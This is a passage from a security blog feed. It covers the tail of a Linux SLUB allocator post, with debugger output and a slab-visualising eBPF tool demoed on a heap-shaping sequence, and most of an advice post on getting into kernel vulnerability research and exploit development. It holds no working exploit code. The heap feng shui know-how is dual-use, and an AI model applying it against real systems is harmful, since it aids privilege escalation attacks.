=&gt; 0xffffffff81347240 &lt;+0&gt;:     nop    DWORD PTR [rax+rax*1+0x0]
   0xffffffff81347245 &lt;+5&gt;:     push   rbp
   0xffffffff81347246 &lt;+6&gt;:     mov    rbp,rsp
   0xffffffff81347249 &lt;+9&gt;:     push   r15
   0xffffffff8134724b &lt;+11&gt;:    push   r14
   0xffffffff8134724d &lt;+13&gt;:    mov    r14d,esi
   0xffffffff81347250 &lt;+16&gt;:    push   r13
   0xffffffff81347252 &lt;+18&gt;:    push   r12
   0xffffffff81347254 &lt;+20&gt;:    push   rbx
   0xffffffff81347255 &lt;+21&gt;:    sub    rsp,0x18
   0xffffffff81347259 &lt;+25&gt;:    mov    QWORD PTR [rbp-0x40],rdi
   0xffffffff8134725d &lt;+29&gt;:    mov    rax,QWORD PTR gs:0x28
   0xffffffff81347266 &lt;+38&gt;:    mov    QWORD PTR [rbp-0x30],rax
   0xffffffff8134726a &lt;+42&gt;:    xor    eax,eax
   0xffffffff8134726c &lt;+44&gt;:    cmp    rdi,0x2000
   0xffffffff81347273 &lt;+51&gt;:    ja     0xffffffff813474d8 &lt;__kmalloc+664&gt;
   0xffffffff81347279 &lt;+57&gt;:    mov    rdi,QWORD PTR [rbp-0x40]
   0xffffffff8134727d &lt;+61&gt;:    call   0xffffffff812dbe70 &lt;kmalloc_slab&gt;
   0xffffffff81347282 &lt;+66&gt;:    mov    r12,rax
   ...</code></pre><p>Okay, nice, we can see the call to <code>kmalloc_slab()</code> on line 20, so we just need to check the return value after that <code>call</code> :) Cos we&apos;re on <code>x86_64</code> we know it&apos;ll be in <code>$RAX</code>.</p><pre><code>&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; registers &#x2500;&#x2500;&#x2500;&#x2500;
$rax   : 0xffff888100041a00  &#x2192;  0x0000000000035140  &#x2192;  0x0000000000035140
...
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; code:x86:64 &#x2500;&#x2500;&#x2500;&#x2500;
   0xffffffff81347273 &lt;__kmalloc+51&gt;   ja     0xffffffff813474d8 &lt;__kmalloc+664&gt;
   0xffffffff81347279 &lt;__kmalloc+57&gt;   mov    rdi, QWORD PTR [rbp-0x40]
   0xffffffff8134727d &lt;__kmalloc+61&gt;   call   0xffffffff812dbe70 &lt;kmalloc_slab&gt;
 &#x2192; 0xffffffff81347282 &lt;__kmalloc+66&gt;   mov    r12, rax
...
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; trace &#x2500;&#x2500;&#x2500;&#x2500;
[#0] 0xffffffff81347282 &#x2192; __kmalloc(size=0x108, flags=0xdc0)
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;
gef&#x27A4;  p *(struct kmem_cache*)$rax
$6 = {
  ...
  size = 0x200,
  object_size = 0x200,
  ...
  ctor = 0x0 &lt;fixed_percpu_data&gt;,
  inuse = 0x200,
  ...
  name = 0xffffffff8297cb4c &quot;kmalloc-512&quot;,</code></pre><p>And voila! We cast the value returned by <code>kmalloc_slab()</code> as a <code>kmem_cache</code> and just like that we can view the members. We can see the name is indeed <code>kmalloc-512</code> as we hypothesised and we can also see some of the other fields we touched on :) </p><p>Anyway, hopefully that was a fun little demo on how you can reinforce your understanding with a little exploration in the debugger.</p><p>I also wanted to highlight <code><a href="https://github.com/osandov/drgn">drgn</a></code> as another debugger to tinker with, which lets you do live introspection &amp; debugging on your kernel. It&apos;s written in python and is very programmable, however I couldn&apos;t get it to find some symbols for this particular demo.</p><h4 id="slxbtrace-ebpf">slxbtrace (ebpf)</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/exited_dance.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>Now for the grand reveal, the real reason behind this 5,000 word (yikes) post ... a cool little tool I&apos;ve been working on for visualising slub allocations :D </p><p>Well, this could very well already be a thing, but I&apos;d been sleeping on ebpf for far too long and this seemed like a fun way to explore the tooling.</p><p>Without going too much into the ebpf implementation (another post, maybe?!), <code>slxbtrace</code><sup>[3]</sup> lets you specify a specific cache size and visualise the cache state. 
In particular you can highlight allocations from particular call sites, making it a neat tool for helping with heap feng shui during exploit development.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2022/11/slxbtrace_demo.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="2558" height="1344"><figcaption>pls excuse the flickering... my fault for using linux</figcaption></figure><p>Let me explain what on earth is going on here. So, <code>slxbtrace</code> will basically hook and process calls to <code>kmalloc()</code> and <code>kfree()</code> and show you what&apos;s where in a cache.</p><p>So far it&apos;s pretty naive: when you run it, it has no knowledge of the cache state. However, once it starts catching <code>kmalloc()</code>&apos;s it can build up an idea of where the slabs are (as they&apos;re page aligned) and the objects in them.</p><p>Each known slab is visualised. We can see the slab address on the left, and then the objects in the slab as they&apos;d sit in memory:</p><ul><li><code>?</code> means <code>slxbtrace</code> doesn&apos;t know the state of this object</li><li><code>-</code> represents a free object</li><li><code>x</code> represents a misc allocation</li><li><code>0...</code> we can then tag specific allocations so they&apos;re easy to visualise</li></ul><p>So what&apos;s going on in this demo?! Well I am tracking the state of the <code>kmalloc-cg-32</code> cache with <code>slxbtrace</code> on the left, while I run a program which triggers a bunch of kmallocations on the right (<code>kmalloc32-fengshui</code>). 
This program:</p><ol><li>Triggers 800 allocations of <code>struct seq_operations</code>, whose allocations are tracked as <code>|0|</code>, to fill up some slabs!</li><li>Frees every other <code>struct seq_operations</code> after the first 400, effectively trying to make some holes (denoted by <code>|-|</code>) in the slabs we just filled up</li><li>Next I allocate a bunch of <code>struct msg_msgseg</code>s of the same size (denoted by <code>|1|</code>), trying to land them next to my <code>struct seq_operations</code> in memory :D </li><li>Finally I clean up everything and free it all :) </li></ol><p>Right now this is just a very, very barebones poc and likely has some issues, but I thought it would be neat to share here as it demonstrates some of the stuff we&apos;ve touched on.</p><p>I will absolutely share all this on my github though, once it&apos;s in a shareable state, just in case anyone else is also interested in playing around!</p><hr><ol><li><a href="https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab">https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab</a></li><li><a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/#debugging">https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/#debugging</a></li><li>not the final name, probably</li></ol><h3 id="wrapping-up">Wrapping Up</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/we_survived.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>Is this... did we... is it over? This one really turned into an absolute leviathan, but perhaps that&apos;s just a testament to the work that goes on behind the kernel&apos;s slab allocator!</p><p>In this post we covered an integral part of the kernel&apos;s memory management subsystem: the slab allocator. 
Specifically, we looked at the SLUB implementation which is the de facto implementation on modern systems (bar embedded stuff). </p><p>We really lived up to the Linux internals namesake in this post, as we dived in and explored the SLUB allocator from all angles: the underpinning data structures, the API used by the rest of the kernel and then validated this all with some introspection.</p><p>Hopefully this provided a reasonably holistic insight into slab allocators, with opportunities for further reading/exploration readily available. </p><p>Also worth noting we kept things pretty shiny as we looked primarily at the latest (at the time of starting) kernel release, v6.0.6!</p><p>I was going to expand a bit on SLAB and SLOB, but to be honest we&apos;re almost at 6000 words and it&apos;s probably out of scope for my aims for this series, but just in case:</p><ul><li>SLAB (not the default for some 14 years now) was the previous default implementation and the tl;dr is it was more complex than SLUB and less friendly to modern multi-core systems <sup><a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">[1]</a></sup></li><li>SLOB was introduced ~2005 and aimed at embedded devices, trying to keep things as compact as possible to make the most of less memory <sup><a href="https://lwn.net/Articles/157944/">[2]</a></sup></li></ul><hr><ol><li><a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">https://www.kernel.org/doc/gorman/html/understand/understand011.html</a></li><li><a href="https://lwn.net/Articles/157944/">https://lwn.net/Articles/157944/</a></li></ol><h2 id="next-time">Next Time!</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/still_here.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>Well, to be honest, as far as &quot;<strong>Memory Allocators</strong>&quot; goes as a topic, we&apos;ve done pretty well between our coverage 
on the buddy and slab allocators.</p><p>I&apos;m not entirely sure there will be a next time for this mini series, I might hop back onto the virtual memory stuff and look into the lower level implementation there.</p><p>That said, if I were to explore the memory allocator space more I&apos;d want to cover the security side of things: memory allocators in the context of exploit techniques and mitigations. If that&apos;s something you&apos;d be into, feel free to let me know :)</p><p>Otherwise: thanks for reading, and as always feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[So You Wanna Pwn The Kernel?]]></title><description><![CDATA[My aim for this post is to provide some insights for getting into Linux kernel vulnerability research and exploit development]]></description><link>https://sam4k.com/so-you-wanna-pwn-the-kernel/</link><guid isPermaLink="false">6308337592020209c38fb0fa</guid><category><![CDATA[VRED]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Thu, 01 Sep 2022 14:07:40 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/08/confused_girl.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/08/confused_girl.gif" alt="So You Wanna Pwn The Kernel?"><p>Initially I was going to write the next instalment of the Linternals: Virtual Memory series after getting back from <a href="https://conference.hitb.org/hitbsecconf2022sin/">HITB2022SIN</a>, but after a number of offline and online conversations it seems like this could help a number of you out, so let&apos;s give it a go!</p><p>My aim for this post is to provide some insights into getting into Linux kernel <strong>v</strong>ulnerability <strong>r</strong>esearch and <strong>e</strong>xploit <strong>d</strong>evelopment (VRED), although I&apos;m sure some of this 
will be transferable to similar areas.<sup>[1]</sup></p><p>Sounds fairly straightforward, right? Well, much like the process of writing a kernel exploit, diving into this can also be open-ended and confusing. There are many approaches and a wealth of resources out there, with no clearly defined path to follow.</p><p>Is this post going to pave that clearly defined path? Probably not. We all learn in different ways, have different experiences, motivations and goals. Hopefully, however, I can help demystify this topic a bit for you and give you the tools necessary to pave the right path for you.</p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#overview">Overview</a></li>
<li><a href="#mindset">Mindset</a>
<ul>
<li><a href="#motivation">Motivation</a></li>
<li><a href="#curiosity">Curiosity</a></li>
<li><a href="#perseverance">Perseverance</a></li>
<li><a href="#ego">Ego</a></li>
</ul>
</li>
<li><a href="#approaches">Approaches</a>
<ul>
<li><a href="#reading">Reading</a></li>
<li><a href="#videos">Videos</a></li>
<li><a href="#projects">Projects</a></li>
</ul>
</li>
<li><a href="#workflow">Workflow</a>
<ul>
<li><a href="#tooling">Tooling</a></li>
<li><a href="#organisation">Organisation</a></li>
<li><a href="#staying-up-to-date">Staying Up-To-Date</a></li>
<li><a href="#having-a-gameplan">Having a Gameplan</a></li>
</ul>
</li>
<li><a href="#resources">Resources</a>
<ul>
<li><a href="#ctfs">CTFs</a></li>
<li><a href="#reading-materials">Reading Materials</a></li>
<li><a href="#tools">Tools</a></li>
<li><a href="#video-materials">Video Materials</a></li>
</ul>
</li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<!--kg-card-end: markdown--><hr><ol><li>For a more general post on demystifying security research, I absolutely recommend a post of the same title by <a href="https://twitter.com/alexjplaskett">Alex Plaskett</a> <a href="https://alexplaskett.github.io/demystifying-security-research-part1/">here</a>, which touches on similar themes</li></ol><h2 id="overview">Overview</h2><p>As I mentioned above, linux vred is a complex and constantly evolving topic. So as you might imagine, trying to write an accessible, usable introduction to this topic has its own challenges. But we gotta try!</p><p>The first thing I want to cover is <strong>mindset</strong>. Yeah, I get it, sounds wishy-washy and inactionable, but I think it will help to talk a bit about some useful mindset tips for approaching work like this and avoiding burnout. </p><p>Then I&apos;ll move on to talking about <strong>approaches</strong> you can take to begin your journey down the rabbit hole that is linux vred and hone your skills. Again, worth highlighting here that these are just suggestions from my experiences and are non-exhaustive.</p><p>I&apos;ll briefly touch on my <strong>workflow</strong> and some of the tooling I find useful; again, this is really personal preference, but may be helpful as a starting point. Plus I always find it interesting to hear what cool tools and workflows other people use! </p><p>Finally I&apos;ll wrap things up with a list of <strong>resources</strong>; this will be far from exhaustive as well, but hopefully I&apos;ll get a decent amount of stuff in there!</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/08/we_got_this.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" 
loading="lazy" width="480" height="262"></figure><h2 id="mindset">Mindset</h2><h3 id="motivation">Motivation</h3><p>At risk of sounding like one of those YouTube motivational speakers, one of the first things you want to understand is your motivation for getting into this.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x1F4A1;</div><div class="kg-callout-text">Do you love understanding things and then breaking them? Do you use Linux daily and finally want to get back at it? Do you want to pivot from exploiting a different platform? Did you watch the movie Blackhat (2015)? Do you want a new hobby to keep you up till 4am?</div></div><p>Whatever your motivation, it&apos;s important to go into this with the understanding that this is a long journey, you (probably) won&apos;t be pwning kernels overnight! In fact, you&apos;ll never understand everything. There will be many &quot;failures&quot; and hurdles along the way.</p><p>But that&apos;s okay! Actually, it&apos;s more than okay, that means you&apos;re (probably) doing it right! Though, I&apos;d be lying if I said this cycle of learning and &quot;failure&quot; with the occasional success wasn&apos;t a magnet for burnout and motivational humps.</p><p>However, by understanding your motivations and goals, as well as what you&apos;re getting into, these motivational humps can be more manageable and infrequent. </p><p>In terms of managing these humps, try where possible to prioritise working on things you enjoy and are interested in. Not only will it be better for your mental health, but you&apos;ll also likely find yourself more productive. </p><p>Due to the open-ended and exploratory nature of vred, you&apos;re not gonna have a good time trying to innovate and seek out solutions if you&apos;re completely unmotivated to do so. For the same reason, having some structure and milestones associated with tasks also helps prevent feelings of aimless drifting or getting overwhelmed. 
</p><p>Like I said though, these humps aren&apos;t always avoidable and are managed differently by different people, so I won&apos;t pretend to know the answers. For example, a common recommendation, and one I use, is to remember to context switch! </p><p>If you&apos;ve been bashing your head against the keyboard for some months, neck-deep in C source code trying to find a particular primitive, sometimes it can help to take a pause. Go write that Python tool you&apos;ve been meaning to. No, you won&apos;t forget everything. In fact, you may come back with a fresh perspective and clear mind.</p><h3 id="curiosity">Curiosity</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/08/piqued_interest.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="400" height="225"></figure><p>Curiosity may have killed the cat, but it&apos;s a security researcher&apos;s best friend. Especially starting out, it can be tempting to rush to popping that shell. </p><p>Trust me, I&apos;ve been guilty of it many a time. You&apos;re just starting out and trying a kernel CTF and you just want to get that flag to prove you can do it, right? So you Google some techniques and you copy and paste some code, tweak some stuff and keep iterating until you get it.</p><p>But as Emerson said, &quot;It&apos;s not the destination, it&apos;s the journey&quot;. More important than popping the shell, is understanding how you popped it. The former may be a win here, but it&apos;s that deeper understanding which will net you future wins.</p><p>Be curious! Ask questions! Take your time. If you don&apos;t quite understand this technique you&apos;ve seen, spend some time playing around with it until you do. If something isn&apos;t working, spend some time getting to the root cause rather than jumping straight to another approach. 
</p><p>This fundamental understanding you&apos;ll develop by being curious is a lot more flexible and applicable to future projects than a surface-level awareness of potential techniques or approaches. </p><h3 id="perseverance">Perseverance</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/08/frustrated.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="356" height="200"></figure><p>I&apos;ve touched on this a few times now: kernel VRED is both complex and open-ended. Not only is there no clear path to winning, sometimes there is no path at all. </p><p>There might not be a bug in that module you&apos;ve been looking at or a way to elevate your privileges with that heap overflow. Again, that&apos;s okay, it&apos;s normal!</p><p>Being able to persevere in the face of regular hurdles and dead-ends is key. An important aspect of this is defining &quot;success&quot; and &quot;failure&quot;. I&apos;ve thrown the F word around a few times so far, and been mindful to put it in quotes.</p><p>Just because you&apos;ve spent months searching for a bug in a kernel module and come up with nothing doesn&apos;t mean you&apos;ve failed. During that time you&apos;ve likely deepened your understanding of the kernel, improved your workflow, come up with tooling etc.</p><p>All of these are things which can help you &quot;win&quot; going forward, so yes, while perseverance is key when you hit these roadblocks and dead-ends, also try not to just see them as failures! </p><p>It&apos;s also worth noting, the flip side of this is knowing when to call it quits. Later in the workflow section, I talk about having a gameplan for approaching vred tasks, so that when you&apos;ve exhausted it, you know it&apos;s time to move on. </p><h3 id="ego">Ego</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/08/got_no_idea.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" 
loading="lazy" width="640" height="360"></figure><blockquote>&quot;your idea or opinion of yourself, especially your feeling of your own importance and ability&quot; - Cambridge Dictionary on &quot;ego&quot;</blockquote><p>Ego plays a big role in our industry, and fortunately is something that is spoken about more these days. And no, I&apos;m not talking about inflated egos (yet), but <a href="https://www.dictionary.com/browse/impostor-syndrome#:~:text=noun%20Psychology.,luck%20or%20other%20external%20forces.">imposter syndrome</a>. </p><p>In the beginning, you may come into this field finding things extremely daunting and overwhelming. After all, the kernel is huge and complicated and there&apos;s so many super smart people out there publishing some amazing work!</p><p>For many of us, this feeling never goes away. Myself included! I recently did my first conference talk at HITB2022SIN, and I was anxious for weeks in the build-up despite the topic being something I worked on for months and was super familiar with. </p><p>Part of this was to do with public speaking, but part was worrying about the quality and validity of my work in the eyes of peers. What if it was all horribly wrong?!</p><p>So this section is just to reassure that if you feel this, it&apos;s okay, you&apos;re not alone! While this is common, try not to let it get on top of you! My main advice here would be that the only person you should be comparing yourself with is yourself a year or so ago<sup>[1]</sup> :)</p><p>The flip side to this, of course, is that I think it&apos;s good to maintain a level of humility. This is a field that is constantly evolving and you&apos;ll never know it all. Furthermore, due to the complexity of some of this stuff, you might not have a complete understanding. 
This is all okay, just be open, and happy even, to adjust that understanding.</p><hr><ol><li>Totally arbitrary number of course, as you may have taken a break and been working in other areas, but you get the gist of what I mean</li></ol><h2 id="approaches">Approaches</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/08/sausage_hands.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="240"></figure><p>Alright, let&apos;s move on to some hands-on advice! Hopefully now I&apos;ve instilled some of the mindset involved in getting into kernel vred stuff, it&apos;s time to put it to good use!</p><p>As has been a running theme here, there&apos;s many different approaches to get stuck into this and we all approach learning in different ways. I&apos;ve tried to provide a variety of options here, though this is far from an exhaustive list. </p><p>Feel free to experiment, mix-and-match and see what works best for you! To throw in my 10 cents: I have found hands-on projects by far the best method to develop a working understanding of new stuff, supplementing this with some reading. </p><h3 id="reading">Reading</h3><p>Okay, so the bread-and-butter for learning about kernel vred stuff is going to be reading; there&apos;s a wealth of blog posts and publications out there on a range of topics.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/head_tv.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="500" height="281"></figure><p>Not sure what else to say about this, other than that the hardest part here is curating and finding these readings. Contributors range from hobbyists to professional and academic researchers - all publishing in different places. 
</p><p>Beyond the customary &quot;use Twitter&quot; for your infosec needs, I&apos;ve also included a link in the resources below to a great repo called <a href="https://github.com/xairy/linux-kernel-exploitation">Linux Kernel Exploitation</a> maintained by<a href="https://twitter.com/andreyknvl"> @andreyknvl</a> which contains a pretty thorough list of reading materials. </p><p>Coming into this, the amount of materials out there may be overwhelming. I&apos;d just suggest starting with stuff immediately relevant to what you&apos;re working on/interested in. E.g. if you want to try to write a local priv esc, then read some recent LPE write-ups.</p><p>Also remember <strong>curiosity</strong> and <strong>perseverance</strong>. Some/most/all of this stuff may be utter gibberish at first, and that&apos;s fine. Especially with VRED write-ups, each bug and exploit will have its own specific nuances which will be foreign to even experienced folks reading them for the first time. </p><p>Just remember to take your time to pause and follow up each bit you don&apos;t understand, even if it leads you down another rabbit hole, until you can piece it together. </p><p>Also another disclaimer that not everyone who takes the time to share their work is a NYT best seller, graphic designer or native English speaker!</p><h3 id="videos">Videos</h3><p>If you&apos;re more of a visual learner, the options are a bit more limited but not non-existent. Besides my GIFs and occasional diagrams, there is a reasonable number of recorded conference talks available on YouTube.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/tv_popcorn.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="500" height="359"></figure><p>Again, the problem here becomes trying to find which conferences to check out for content, because some of these may not index well and may not have a tonne of views. 
In the <strong>Resources</strong> section below, I&apos;ll include a list of con channels to get you started.</p><p>I&apos;m sure there&apos;s probably some great content creators out there pumping out videos, but as that&apos;s not my preferred media I&apos;m afraid I can&apos;t help much there. If you know of any I can plug here who make vids on Linternals / VRED then @ me pls.</p><h3 id="projects">Projects</h3><p>I feel like theory can only get you so far, and if you&apos;re interested in doing some kernel vred, you&apos;re going to need to get your hands dirty at some point anyway!</p><p>By getting some hands-on experience, you&apos;re able to put into practice the techniques and understanding you&apos;ve gained from your research. Furthermore, sometimes the best way to understand something in the kernel is to get in the debugger and take a peek yourself.</p><p>However, it&apos;s one thing to be told &quot;just get some hands on experience!&quot; and another to actually know where to start, especially if you&apos;re completely new to this.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/not_sure_where_to_start.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="270"></figure><p>As a result, I&apos;ll include some ideas and starting points for potential projects here. You&apos;ll find the more you get into things, the more ideas you&apos;ll have for your own tooling or experiments as you go on:</p><ol><li>A core part of kernel vred is, of course, understanding the kernel, so one project idea could be to try and write your own kernel driver and play around with some features (reading input from userspace via IOCTLs, allocating memory etc.)</li><li>Follow along with exploit write-ups! 
Find a local privilege escalation write-up you like (maybe with source available) and try to follow along with it and get it running in a VM; again, taking the time to understand the hows and whys of what&apos;s going on</li><li>Taking this a step further, you could try the above without source or even without a write-up by looking at some CVEs. Alternatively, piggy-backing off of idea 1 you could write your own vulnerable driver and exploit that :) </li><li>CTFs are of course another popular way to test your kernel vred mettle, and I&apos;ll provide links to some in the resources below.</li><li>Tooling! Writing tooling to improve your kernel vred workflow or even just to explore kernel internals can be a great way to develop that fundamental understanding. Don&apos;t worry if you don&apos;t have ideas right now, trust me you will!</li><li>Posting your own write-ups or analysis! When I started this blog, I actually never intended for anyone to see it, it was just a way to motivate myself to look into various topics and refine my understanding on them via writing accessible posts</li></ol><h2 id="workflow">Workflow</h2><p>Now onto the less glamorous, but just as fundamental part: workflow. I appreciate this is highly preference based, so this is more for reference and because I also find it interesting to hear about other people&apos;s workflows.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/behold_my_stuff.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="270"></figure><p>Your workflow is something that will likely constantly evolve, refined over an iterative process of discovering new tools and deeper understanding of your own preferences, strengths and weaknesses. Don&apos;t be afraid to try new things! 
:) </p><h3 id="tooling">Tooling</h3><p>For my <strong>IDE</strong>, I use &quot;a configuration framework for <a href="https://www.gnu.org/software/emacs/" rel="nofollow">GNU Emacs</a>&quot; called <a href="https://github.com/doomemacs/doomemacs">Doom</a>. It&apos;s very easy to set up (and tweak) and the default settings are pretty good. I actually found this project thanks to a great talk, &quot;<a href="https://www.youtube.com/watch?v=heib48KG-YQ&amp;ab_channel=linux.conf.au">Kernel Hacking Like It&apos;s 2020</a>&quot; by Russell Currey.</p><p>If you&apos;re interested in finding out more about Doom Emacs, there&apos;s <a href="https://www.youtube.com/playlist?list=PLhXZp00uXBk4np17N39WvB80zgxlZfVwj">a cool playlist</a> on YouTube to get you started by <a href="https://www.youtube.com/c/ZaisteProgramming">Zaiste Programming</a>.</p><p>Another cornerstone of my workflow is <strong>virtualisation</strong>. Whenever I&apos;m writing up a new exploit or doing some testing, I&apos;ll be spinning up a representative target VM<sup>[1]</sup>. My tool of choice here is <a href="https://www.qemu.org">QEMU</a>; I find it to be lightweight and very flexible (and it&apos;s free and open-source!).</p><p>The last part of the tooling trifecta for me: the <strong>debugger</strong>. Perhaps unsurprisingly I&apos;m regularly neck-deep in <a href="https://www.google.com/search?q=gdb&amp;sourceid=chrome&amp;ie=UTF-8">gdb</a><sup>[2]</sup>. Despite being quite literally older than me, it still holds up. That said, addons like <a href="https://github.com/hugsy">hugsy</a>&apos;s <a href="https://github.com/hugsy/gef">GEF</a> (GDB Enhanced Features) make life easier.</p><h3 id="organisation">Organisation</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/deaf.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="270"></figure><p>AKA Documentation. Yep, I said it. 
But no, I&apos;m not talking about carefully curated and margin-tweaked executive reports or several hundred page long technical specifications. </p><p>I can&apos;t stress enough how much future you will thank yourself if you get into the habit of documenting your work early on. It doesn&apos;t have to be anything fancy, I just use markdown + git. Just make sure there&apos;s some semblance of order and that it&apos;s going to be easy for you to hunt down and refer back to later.</p><p>You will accumulate <strong><em>a lot </em></strong>of knowledge during your research and you won&apos;t be able to retain all of it, nor will all of it be immediately useful. But having it neatly documented and easy to reference means that when you have to go back to it, you can. It also just helps to reinforce knowledge and understanding too.</p><p>Whether it&apos;s coming back to a kernel module you&apos;ve previously done work on and want a refresher, or if you found a heap shaping primitive in a previous CTF that would be a perfect fit for the one you&apos;re working on now - having notes to refer back to is a life saver. </p><h3 id="staying-up-to-date">Staying Up-To-Date</h3><p>Another useful part of your workflow to consider is keeping up-to-date with the latest kernel gossip. It seems like every week there&apos;s a new write-up or poc dropping and it can be a lot to keep up with, especially when they&apos;re from all over the place.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/gossip.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="270"></figure><p>When I first asked a colleague how they found all these papers and write-ups, they replied Twitter and I 